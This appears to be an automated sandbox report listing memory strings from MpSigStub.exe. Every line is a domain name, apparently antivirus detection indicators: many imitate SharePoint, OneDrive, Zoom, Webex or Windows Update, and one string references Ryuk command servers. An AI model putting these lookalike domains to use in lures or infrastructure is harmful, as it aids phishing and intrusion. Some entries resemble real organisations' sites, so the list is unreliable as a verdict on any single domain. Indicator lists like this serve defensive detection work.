Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p0//harassmentadvisor.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p..harassmentadvisor.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p8//healthsurveysolutions.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p6.healthsurveysolutions.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p2//hotdiscountsonline.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p0.hotdiscountsonline.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p4//maffefinancialgroup.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p2.maffefinancialgroup.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$//medicalreha.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p".medicalreha.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$//notify-wkhs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p".notify-wkhs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p2//nyfinancialcontrol.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p0.nyfinancialcontrol.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p6//onedrivenotification.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p4.onedrivenotification.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p0//quickhealthsurvey.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p..quickhealthsurvey.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p //quip-docs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: .quip-docs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(//r2techsystems.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p&.r2techsystems.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p0//realtek-analytics.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p..realtek-analytics.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p,//sagamorenetwork.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p*.sagamorenetwork.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p,//scripts-careers.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p*.scripts-careers.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p&//serve-update.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$.serve-update.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p6//sharepoint-documents.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p4.sharepoint-documents.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p*//sharepointdocs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(.sharepointdocs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: //smiogin.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: .smiogin.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p://tristatesignaturehomes.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p8.tristatesignaturehomes.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p8//ultracaremedicalgroup.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p6.ultracaremedicalgroup.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p&//webex-online.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$.webex-online.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$//webvpnproxy.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p".webvpnproxy.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(//windowupdates.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p&.windowupdates.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: //zoom-mea.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: .zoom-mea.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: //maxs.fun
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: .maxs.fun
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: //jnorman.io
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: .jnorman.io
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p //foundcare.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: .foundcare.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: //hracc.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: .hracc.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p4//myamericandreamhome.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p2.myamericandreamhome.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p.//recruitercareers.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p,.recruitercareers.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: //smlogin.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: .smlogin.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$//susangkomen.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p".susangkomen.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p8//transportationmanager.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p6.transportationmanager.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: //viewjs.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: .viewjs.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p"//vpn-access.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p .vpn-access.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p4//workplaceharassment.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p2.workplaceharassment.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p*//bloomington-il.org
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(.bloomington-il.org
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p0//consumerprotector.org
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p..consumerprotector.org
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p://tobaccosurvivorsunited.org
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p8.tobaccosurvivorsunited.org
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p*//trans-equality.org
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(.trans-equality.org
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p //xordinance.us
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: .xordinance.us
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: //b0x.xyz
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: .b0x.xyz
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: //maxh.xyz
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: .maxh.xyz
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: !#nri:ryukc2.b
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: zapored.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: gtrsqer.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: chalengges.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: caonimas.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: hakunaman.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p*getinformationss.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p"nomadfunclub.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: harddagger.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: errvghu.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: reginds.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p gameleaderr.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: razorses.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: vnuret.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: regbed.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: bouths.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: ayiyas.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p"serviceswork.net
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: moonshardd.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p hurrypotter.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: biliyilish.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: blackhoall.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p"checkhunterr.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: daggerclip.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: check4list.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: chainnss.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p hungrrybaby.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: martahzz.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p"jonsonsbabyy.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p wondergodst.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: zetrexx.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: tiancaii.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cantliee.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: realgamess.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: maybebaybe.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p&saynoforbubble.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p chekingking.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: rapirasa.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: raidbossa.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: mountasd.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p"puckhunterrr.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: pudgeee.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$loockfinderrs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: lindasak.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: bithunterr.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: voiddas.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: sibalsakie.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: giveasees.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: shabihere.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p&tarhungangster.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: imagodd.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: raaidboss.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: sunofgodd.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p rulemonster.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: loxliver.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(servicegungster.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$kungfupandasa.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$check1domains.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$sweetmonsterr.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: qascker.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: remotessa.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: cheapshhot.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: havemosts.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: unlockwsa.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: sobcase.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p zhameharden.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: mixunderax.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: bugsbunnyy.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(fastbloodhunter.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(serviceboosterr.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p"servicewikii.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p secondlivve.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: quwasd.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$luckyhunterrs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: wodemayaa.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: hybriqdjs.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: gunsdrag.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: gungameon.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p"servicemount.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(servicesupdater.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p*service-boosterr.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(serviceupdatter.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p dotmaingame.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p&backup1service.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p&bakcup-monster.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p&bakcup-checker.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$backup-simple.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$backup-leader.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$backup-helper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(service-checker.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(nasmastrservice.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p&service-leader.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p,nas-simple-helper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: nas-leader.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(boost-servicess.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p&elephantdrrive.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(service-hellper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p*top-backuphelper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: best-nas.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p,top-backupservice.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p,bestservicehelper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: backupnas1.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$backupmastter.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p best-backup.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p viewdrivers.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p,topservicebooster.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p.topservice-masters.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p0topbackupintheworld.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p*topbackup-helper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p2simple-backupbooster.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$top3-services.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(backup1services.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p2backupmaster-service.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p0backupmasterservice.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(service1updater.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: driverdwl.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$backup1master.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p,boost-yourservice.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p&checktodrivers.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$backup1helper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p&driver1updater.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$driver1master.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p view-backup.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p.top3servicebooster.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$servicereader.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: servicehel.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p(driver-boosters.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p&service1update.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p service-hel.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p*driver1downloads.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p"service1view.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p&backups1helper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: idriveview.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$debug-service.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: idrivedwn.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p"driverjumper.com
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	Binary or memory string: p$service1boost.com
